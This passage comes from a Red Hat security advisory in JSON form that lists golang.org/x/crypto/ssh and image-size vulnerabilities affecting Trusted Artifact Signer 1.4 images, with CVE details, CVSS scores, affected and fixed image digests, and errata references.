"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "image-size: image-size: Denial of Service due to infinite loop when processing specially crafted images."
},
{
"cve": "CVE-2026-39828",
"cwe": {
"id": "CWE-281",
"name": "Improper Preservation of Permissions"
},
"discovery_date": "2026-05-22T04:01:46.775641+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480687"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/crypto/ssh. A remote attacker could exploit this vulnerability when an SSH server authentication callback returned a PartialSuccessError with non-nil permissions. This flaw caused these permissions to be silently discarded, potentially bypassing certificate restrictions, such as a force-command, after a second authentication factor succeeded. This could lead to unauthorized command execution or access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: golang.org/x/crypto/ssh: Unauthorized command execution via discarded SSH permissions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important security flaw in the `golang.org/x/crypto/ssh` library. When an SSH server utilizing this library is configured with specific authentication callbacks that return a `PartialSuccessError` with non-nil permissions, an attacker could bypass intended certificate restrictions, such as `force-command`. This bypass could lead to unauthorized command execution or access on affected Red Hat systems configured with multi-factor authentication and certificate-based access controls.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39828"
},
{
"category": "external",
"summary": "RHBZ#2480687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480687"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39828",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39828"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39828",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39828"
},
{
"category": "external",
"summary": "https://go.dev/cl/781621",
"url": "https://go.dev/cl/781621"
},
{
"category": "external",
"summary": "https://go.dev/issue/79562",
"url": "https://go.dev/issue/79562"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI",
"url": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5014",
"url": "https://pkg.go.dev/vuln/GO-2026-5014"
}
],
"release_date": "2026-05-22T02:31:26.883000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: golang.org/x/crypto/ssh: Unauthorized command execution via discarded SSH permissions"
},
{
"cve": "CVE-2026-39829",
"cwe": {
"id": "CWE-1284",
"name": "Improper Validation of Specified Quantity in Input"
},
"discovery_date": "2026-05-22T04:01:30.092249+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480681"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/crypto/ssh. The RSA and DSA public key parsers in the affected component did not enforce size limits on key parameters. This vulnerability allows an unauthenticated client to provide a crafted public key with an excessively large modulus or DSA parameter during public key authentication. Successful exploitation could lead to a denial of service (DoS) due to prolonged CPU consumption during signature verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: golang.org/x/crypto/ssh: Denial of Service via crafted public key with excessive parameters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in golang.org/x/crypto/ssh is rated as Important. An unauthenticated remote attacker could trigger a denial of service by providing a specially crafted public key with excessively large parameters during SSH public key authentication. This could lead to prolonged CPU consumption on the server, impacting service availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39829"
},
{
"category": "external",
"summary": "RHBZ#2480681",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480681"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39829"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39829",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39829"
},
{
"category": "external",
"summary": "https://go.dev/cl/781641",
"url": "https://go.dev/cl/781641"
},
{
"category": "external",
"summary": "https://go.dev/cl/781661",
"url": "https://go.dev/cl/781661"
},
{
"category": "external",
"summary": "https://go.dev/issue/79565",
"url": "https://go.dev/issue/79565"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI",
"url": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5018",
"url": "https://pkg.go.dev/vuln/GO-2026-5018"
}
],
"release_date": "2026-05-22T02:31:27.324000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: golang.org/x/crypto/ssh: Denial of Service via crafted public key with excessive parameters"
},
{
"cve": "CVE-2026-39830",
"cwe": {
"id": "CWE-772",
"name": "Missing Release of Resource after Effective Lifetime"
},
"discovery_date": "2026-05-22T04:01:38.517202+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480684"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/crypto/ssh. A remote malicious SSH peer can exploit this by sending unsolicited global request responses, which fills an internal buffer and blocks the connection\u0027s read loop. This prevents the associated resources from being released, leading to a resource leak per connection. The consequence is a Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: golang.org/x/crypto/ssh: Denial of Service via resource leak from unsolicited SSH responses",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service flaw in `golang.org/x/crypto/ssh`. A remote, unauthenticated attacker can exploit this vulnerability by sending unsolicited global request responses to an affected SSH server, leading to resource exhaustion and a denial of service. The impact is considered Important due to the potential for unauthenticated remote disruption of services utilizing the vulnerable SSH library.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39830"
},
{
"category": "external",
"summary": "RHBZ#2480684",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480684"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39830",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39830"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39830",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39830"
},
{
"category": "external",
"summary": "https://go.dev/cl/781640",
"url": "https://go.dev/cl/781640"
},
{
"category": "external",
"summary": "https://go.dev/cl/781664",
